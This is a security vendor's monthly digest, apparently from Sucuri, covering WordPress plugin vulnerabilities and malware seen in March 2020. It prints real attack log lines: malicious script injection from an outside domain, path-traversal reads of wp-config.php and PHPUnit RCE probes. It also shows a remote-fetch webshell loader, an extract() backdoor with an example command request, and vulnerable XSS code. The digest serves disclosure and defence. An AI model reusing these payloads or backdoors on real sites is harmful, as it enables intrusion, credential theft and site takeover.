Sucuri Labs

The home of our Security Engineering Group, including our Threat Research, Technical Security and Automation teams.

Vulnerabilities Digest: March 2020

Fixed Plugins and Vulnerabilities

PluginVulnerabilityPatched VersionInstalls
CookiebotReflected Cross-Site Scripting3.6.140000
Data Tables Generator By SupsysticAuthenticated Stored XSS1.9.9230000
WPvivid BackupDatabase Leak0.9.3640000
Advanced AdsReflected XSS1.17.4100000
Category Page IconsArbitrary File Upload/Deletion0.9.1Closed
CookiebotReflected Cross-Site Scripting3.6.140000
Custom Post Type UICSRF to Stored XSS1.7.4800000
FruitfulAuthenticated Stored XSS3.8.29000
responsive-add-onsUnprotected AJAX Endpoints2.2.640000
Import Export WordPress UsersAuthenticated Arbitrary User Creation1.3.930000
LearnPressPrivilege Escalation3.2.6.770000
Multiple PluginsUnauthenticated RCE via PHPUnitall-
Multiple WebToffee PluginsCSRF1.3.32000
Popup BuilderMultiple Issues3.64.1100000
Viral OptinsArbitrary File Uploadallclosed
WordPress File UploadDirectory Traversal to RCE4.13.020000
WPMLCross Site Request Forgery to RCE4.3.730000

 

Highlights for March 2020

Cross site scripting and Cross Site Request Forgery vulnerabilities were most prevalent this month. Attackers took advantage of the lack of restrictions in critical functions and issues surrounding user input data sanitization.

Ongoing Campaign Targets Plugin Vulnerabilities

An ongoing malicious campaign that we’ve been actively tracking since early 2019 continues targeting new plugin vulnerabilities to inject malicious domains.

Malicious domain injected during this month: clon[.]collectfasttracks[.]com

Social Metrics Tracker

185.50.197.12 - --3e87eee3d[...]script type=text/javascript src='https://clon.collectfasttracks.com/hos?&v5'></script>\x0D\x0A--3e87eee3d99c55ee9a39a59184ff3f05905a195557207837f3015d906347--\x0D\x0A [15/Mar/2020:19:55:14 +0000] "POST /wp-admin/admin-post.php?page=social-metrics-tracker-export&smt_download_export_file=1§ion=gapi HTTP/1.1" 

Simple Fields

185.50.197.12 - --3e87eee3d[...]script type=text/javascript src='https://clon.collectfasttracks.com/hos?&v5'></script>\x0D\x0A--3e87eee3d99c55ee9a39a59184ff3f05905a195557207837f3015d906347--\x0D\x0A [15/Mar/2020:19:55:14 +0000] "POST /wp-admin/admin-post.php?page=social-metrics-tracker-export&smt_download_export_file=1§ion=gapi HTTP/1.1" 

Pricing Table by Supsystic

 185.212.128.162 - - [18/Mar/2020] "GET /wp-admin/admin-ajax.php?action=getJSONExportTable&tables[]=8&reqType=ajax&mod=tables&pl=pts HTTP/1.1" 

Brizy – Page Builder

207.180.198.200 - - [12/Mar/2020] "GET /wp-content/plugins/brizy/admin/site-settings.php HTTP/1.1" 

WP Security Audit Log

207.180.198.200 - - [12/Mar/2020] "GET /wp-content/plugins/brizy/admin/site-settings.php HTTP/1.1" 

WordPress WP User Frontend

185.219.168.18 - - [17/Mar/2020] "GET /wp-admin/admin-ajax.php?action=wpuf_file_upload HTTP/1.1"

Adblock Blocker

185.219.168.18 - --0747fb1e8d3cfc0d658e7a77f51c7758\x0D\x0AContent-Disposition: form-data; name=\x22popimg\x22; filename=\x22settings_auto.php\x22\x0D\x0A\x0D\x0A[...] echo \x22not exits\x22;\x0D\x0Aecho \x22done .\x5Cn \x22 ;\x0D\x0A\x0D\x0A@unlink(__FILE__);\x0D\x0A?>\x0D\x0A\x0D\x0A--0747fb1e8d3cfc0d658e7a77f51c7758--\x0D\x0A [17/Mar/2020:13:25:45 +0000] "POST /wp-admin/admin-ajax.php?action=getcountryuser&cs=2 HTTP/1.1" 

Multiple Plugins - Access to Sensitive Files

113.162.159.230 -- GET -- /wp-content/plugins/google-mp3-audio-player/direct_download.php?file=..%2F..%2F..%2Fwp-config.php -- - -- 2020-03-23
113.162.159.230 -- GET -- /wp-content/plugins/wp-filemanager/incl/libfile.php?&path=..%2F..%2F..%2F..%2F&filename=wp-config.php&action=download -- - -- 2020-03-23
113.162.159.230 -- GET -- /wp-content/themes/ctu/framework/utilities/download/getfile.php?file=..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php -- - -- 2020-03-23
113.162.159.230 -- GET -- /wp-content/plugins/recent-backups/download-file.php?file_link=..%2F..%2F..%2Fwp-config.php -- - -- 2020-03-23
113.162.159.230 -- GET -- /wp-content/themes/ctu/lib/downloadlink.php?file=..%2F..%2F..%2F..%2Fwp-config.php -- - -- 2020-03-23
113.162.159.230 -- GET -- /wp-content/themes/ctu/lib/scripts/download.php?file=..%2F..%2F..%2F..%2F..%2Fwp-config.php -- - -- 2020-03-23
113.162.159.230 -- GET -- /wp-content/plugins/db-backup/download.php?file=..%2F..%2F..%2Fwp-config.php -- - -- 2020-03-23
113.162.159.230 -- GET -- /wp-content/plugins/aspose-doc-exporter/aspose_doc_exporter_download.php?file=..%2F..%2F..%2Fwp-config.php -- - -- 2020-03-23

Multiple Plugins Affected by an Old Vulnerability in PHPUnit

As seen in January attackers are continuing to leverage an RCE in PHPUnit along with several plugin vulnerabilities found in the past month.

Unpatched versions of PHPUnit prior to 4.8.28 and 5.6.3 allow remote attackers to execute arbitrary PHP code via HTTP POST data.

Jekyll-exporter

118.27.25.88 - <?php  echo 'RCE_VULN|'; echo php_uname();?> [13/Mar/2020] "POST //wp-content/plugins/jekyll-exporter/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1"

Wp-heyloyalty

118.27.5.203 - <?php  echo 'RCE_VULN|'; echo php_uname();?> [12/Mar/2020] "POST //wp-content/plugins/wp-heyloyalty/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1"
[...]

Detected IPs

163.44.149.193
118.27.5.203
118.27.25.88
185.219.168.18
77.71.115.52
182.161.69.114
5.101.0.209
190.117.233.1

Public exploits already exist for all of the components listed above. We strongly encourage you to keep your software up to date to prevent infection and mitigate risk to your environment. Websites behind the Sucuri Firewall are protected against these exploits.

Tiny WSO Webshell Loader

A PHP webshell is a common tool found on compromised environments. Attackers use webshells as backdoors, allowing them to maintain unauthorized access to a hacked website.

Bad actors can also use webshells to perform various functions within a single PHP file, which they typically create after their initial exploit of the website. Some of these functions include obtaining sensitive details on a web server’s configuration, file management, SQL connections, and additional backdoor payloads like reverse shells.

It’s usually unnecessary for an attacker to create their own custom PHP webshell. Instead, they often use PHP webshells which are readily available and popular within hacking communities, including WSO, c99, B347K, and r57.

Here's what a WSO PHP webshell loaded within a browser looks like:

PHP Webshell in browser

Since PHP webshells are common on hacked websites, they are susceptible to being detected by server side scanning tools. The capabilities of a PHP webshell also require more code, meaning there’s a larger disk footprint when compared to existing legitimate PHP files used by the website.

Besides their large disk usage, the webshell’s code also contains PHP code that is easy for scanners to detect. For example, when the PHP code contains a FilesMan reference:

session_start();
$password = "";
$passtype = "";
$color = "#df5";
$default_action = 'FilesMan';

This WSO PHP webshell variant contains over 1,900 lines of PHP code in total. Its larger-than-normal file size is a red flag for scanning technologies — leading hackers to leverage methods which prevent them from storing all of the PHP webshell’s code on the hacked website’s file system.

So, what is one method that a hacker can employ to upload a webshell to a hacked website without actually storing the code within the website’s file structure? They can use file_get_contents method, as seen in this small WSO webshell loader found on a hacked website.

session_start<?php
$a = file_get_contents('https://[REDACTED]/files/readme.txt');
eval('?>'.$a);

This method effectively reduces a 1,900+ line PHP webshell into just two lines of PHP code. It simply assigns a variable, $a, with the output of the file_get_contents function which is used to grab the PHP webshell’s source code from a third party location. It then stores it in memory, rather than a file on disk.

Next, the loader uses eval to execute the stored PHP code in the $a variable, loading the webshell without having to store the entire code within the website’s file system.

You may wonder why the PHP webshell’s code exists as a .txt file on the third party website. This is because if it were using its native .php file extension, then the third party website server would execute the PHP webshell’s code rather than downloading the code’s text requested with file_get_contents. This also requires the webshell loader’s eval function to use a closing tag/EOF, preventing syntax errors when loading the webshell PHP code from the third party server.

As webshells operate as a backdoor, they are best detected with file monitoring and the use of a server side scanner. If changes, deletions, or additions to the environment are detected, you’ll be notified of any indicators of compromise.

Reflected XSS in Cookiebot Administrative Page

A reflected XSS vulnerability has recently been found in the Cookiebot plugin plugin, impacting a user base of over 40k installs. Versions prior to 3.6.1 are susceptible to this attack, which allows hackers to exploit the vulnerability found on administrative pages.

This vulnerability is caused by the manual tabs mechanism, which tries to add a class to the form with the current tab.

<?php if ( isset( $_GET['tab'] ) ) {
     $active_tab = $_GET['tab'];
} else if ( $active_tab == 'unavailable_addons' ) {
     $active_tab = 'unavailable_addons';
} else {
     $active_tab = 'available_addons';
} ?>

// ...

<form method="post" action="options.php" class="<?php echo $active_tab; ?>">

The issue lies in the fact that only two tab types should be present: available_addons or unavailable_addons. These values are never checked, however, and are directly inserted into the form class attribute.

This improper implementation leads to the potential for a reflected cross-site scripting attack which relies on human behavior - such as an administrator visiting a link.
If the website administrator visits an attacker’s specially crafted URL, the bad actor may be able to compromise and take over the website.

Timeline:

  • 2020-03-11: Initial disclosure
  • 2020-03-12: Version 3.6.1 released

Mitigation Steps:

Websites using Cookiebot versions lower than 3.6.1 should update their plugins to the latest patch immediately to mitigate risk. As always, customers using our WAF are protected from this issue with our virtual patching technology.

 

Extract Function Backdoor Variant

We recently found malware on a client’s WordPress site that was using a variant of a backdoor that we previously covered back in 2014.

The primary difference in this backdoor is that the malware has been formatted so that it is easier to use PHP functions like file_put_contents() to create additional malicious files from code within an attacker’s HTTP request.

A second different characteristic is that the malware requires that the attacker provide a value that will match the MD5 hash defined within the code. If this value is not provided, or if it does not match, then the malware will use die() to stop running and will not proceed. This essentially works as a password so that the malware cannot be used unless the correct ($b) value is known and provided in the HTTP request. That being said, anyone with access to modify the file can simply remove the code checking for the MD5 hash.

The values for the variables ($b, $c, $f, and $a) are provided through the attacker’s HTTP request and passed through the PHP function extract():

<?php
extract($_REQUEST);
if (md5($b) != '21232f297a57a5a743894a0e4a801fc3')
{
   die();
}
$c($f, $a);
include_once $f;
?>

The variable structure $c($f, $a) makes it easy to use file_put_contents (not limited to just this function), which allows an attacker to insert virtually any code into a file.

Finally, the last line of the malicious code uses include_once to load the malicious code that was inserted into a file by the attacker.

One primary example of malicious use includes using file_get_contents() to download a PHP web shell. Another example would be using system() to run arbitrary commands like ls for obtaining directory and file listings.

/sample.php?c=file_put_contents&a=<%3Fphp+system("ls+-lhart")%3B+%3F>&b=admin&f=test.php

PHP Sample

Website owners can use a web application firewall to block malicious requests to this type of injection.

Firewall block page

Reflected XSS in Advanced Ads Admin Dashboard

A patch for a vulnerability in the Advanced Ads plugin has been released. Prior to version 1.17.4, attackers were able to exploit two reflected XSS attacks via the admin dashboard.

Both vulnerabilities are related to the advads-last-edited-group property, which should normally be a number.

As the argument in this property was not sanitized, a malicious payload can be injected into websites using vulnerable versions of this plugin, causing up to two reflected XSS on the page.

$last_edited_group_id = 0;
if ( isset( $_REQUEST['advads-last-edited-group'] ) ) {
        $last_edited_group_id = $_REQUEST['advads-last-edited-group'];
        ?>
        <script>
                var body = document.getElementsByTagName("body")[0];
                body.addEventListener("load", function(){
                        jQuery('#advads-ad-group-<?php echo $last_edited_group_id; ?>').get(0).scrollIntoView(false);
                }, true);
        </script>
        <?php
}// ...
<div id="advads-ad-group-list">
        <form action="" method="post" id="advads-form-groups">
                <?php wp_nonce_field( 'update-advads-groups', 'advads-group-update-nonce' ); ?>
                <table class="wp-list-table widefat fixed adgroups">
                        <?php $ad_groups_list->render_header(); ?>
                        <?php $ad_groups_list->render_rows(); ?>
                </table>
<input type="hidden" name="advads-last-edited-group" id="advads-last-edited-group" value="<?php echo $last_edited_group_id; ?>"/>
                <div class="tablenav bottom">
                        <?php submit_button( __( 'Update Groups', 'advanced-ads' ) ); ?>
                </div>
        </form>
</div>

If a website administrator visits an attacker’s specially crafted link, the bad actor may be able to gain access to the compromised environment and obtain access to the account.

Timeline:

  • 2020-03-08: Initial disclosure
  • 2020-03-09: Update provided by the developer
  • 2020-03-09: Version 1.17.4 released

Mitigation Steps:

Websites with Ads Admin versions lower than 1.17.4 should update their plugins to the latest patch immediately to mitigate risk. As always, customers using our WAF are protected from this issue with our virtual patching technology.

 

Innocent Defacement

When we talk about defacements, we’re usually referring to attacks leading to a visual takeover of a website’s page ― consider it a form of vandalism or graffiti.

Often distributed by hacktivists via political motivation, defacements usually include one of the following scenarios: either the attacker has replaced the existing page with content related to a specific theme like raising awareness to a particular website vulnerability or a political topic, or simply hosting general information about the attacker to get some “street rep”.

Once in a while, we find a defacement that doesn’t really fit either of these scenarios. For example, our colleague Kaushal Bhavsar recently found this defacement that seemed to have only one sole objective: to be really annoying.

Innocent defacement found on compromised website

When visiting the site, users see the overlay (above) with absolutely no way to minimize or remove it from the interface. And while this may not seem like an obvious website threat, this clearly indicates a compromised environment.

Here is the code that the attacker injected into the theme’s footer.php file to serve the unwanted pop-up:

<?php
<script>
jQuery(document).ready(function(){
    jQuery('body').append('<div class="alert-box" style="display: block;position: fixed;top: 0;right: 0;left: 0;width: 50%;background-color: white;text-align: center;margin: 0 auto;margin-top: 19%;border: 4px solid red;border-radius: 10px;padding-top: 15px;padding-bottom: 15px;z-index: 99999999999;"><p style="color: red;font-size: 18px;height: auto;line-height: initial;margin-bottom: 2px;">NOTICE!</p><p style="color: red;font-size: 18px;height: auto;line-height: initial;margin-bottom: 2px;">Owner of  https://REDACTED.com </p><p style="margin-bottom: 0px;color: red;font-size: 18px;height: auto;line-height: initial;">This website is not equipped with readability feature for Visually impaired!</p></div>');
});
</script>

?>

This defacement may seem strange, but we can speculate on why it was added to the website. Perhaps the attacker was trying to be annoying or raise awareness to the fact that the website was vulnerable?

Luckily, the attacker didn’t include more disruptive malware or unsavory content, but the effects of this compromise could have been devastating.

To mitigate risk, we encourage website owners to keep an eye out for any changes to website files. Website monitoring solutions can help you detect code anomalies, modifications like this defacement, and other indicators of compromise on your website.

Phishing and Malware via SMS Text Message

We’ve recently noticed an increase in reports of phishing and malware being distributed via SMS text messages.

During one investigation, we identified fake messages sent from a random number pretending to be Amazon. The message contents ask the victim to click on the link to confirm their shipping address.

Fake Amazon phishing text message

The URL bears no resemblance to Amazon and clearly doesn’t employ Amazon’s URL shortener (amzn.com). Unfortunately, we were unable to confirm exactly what the attackers were directing users to since hxxp://k8esv[.]info now returns a 404 (Not Found) response, but it's clear that it’s being used for phishing or malware.

In most phishing cases seen distributed via SMS, victims are taken to a fake page ― for example, one that looks like Amazon’s signup page ― and asked to login to access important order information or confirm a purchase.

To the untrained eye, these SMS phishing pages might appear to belong to the real Amazon website, but submitting login credentials typically results in a successful phish ― and an account compromise.

The suspicious domain is hosted on 47.240.4.254 which also appears to be hosting other similar domains:

suspicions phishing domains hosted on 47.240.4.254

The IP address belongs to Alibaba Cloud:

Alibaba.com LLC AL-3 (NET-47-235-0-0-1) 47.235.0.0 - 47.246.255.255

ALICLOUD-HK ALICLOUD-HK (NET-47-240-0-0-1) 47.240.0.0 - 47.240.255.255

The domain was registered through namecheap.com and has WHOIS protection, so we can’t see who was responsible for registering hxxp://k8esv[.]info. What we can tell is that these other suspicious domains were also registered there, suggesting the same person was involved.

We’re finding many variations of SMS phishing campaigns, and not every text looks the same. Users should always exercise caution when receiving SMS from unknown numbers.

To mitigate risk, avoid clicking on any links inside text messages ― especially if they are coming from an unknown number and lead to suspicious URLs. If you receive an SMS message similar to this one, login directly to your Amazon account via the Amazon website and check if there are any issues or status updates that require your attention from the account dashboard.

We will continue investigating this campaign to see if we can get more details about the attack.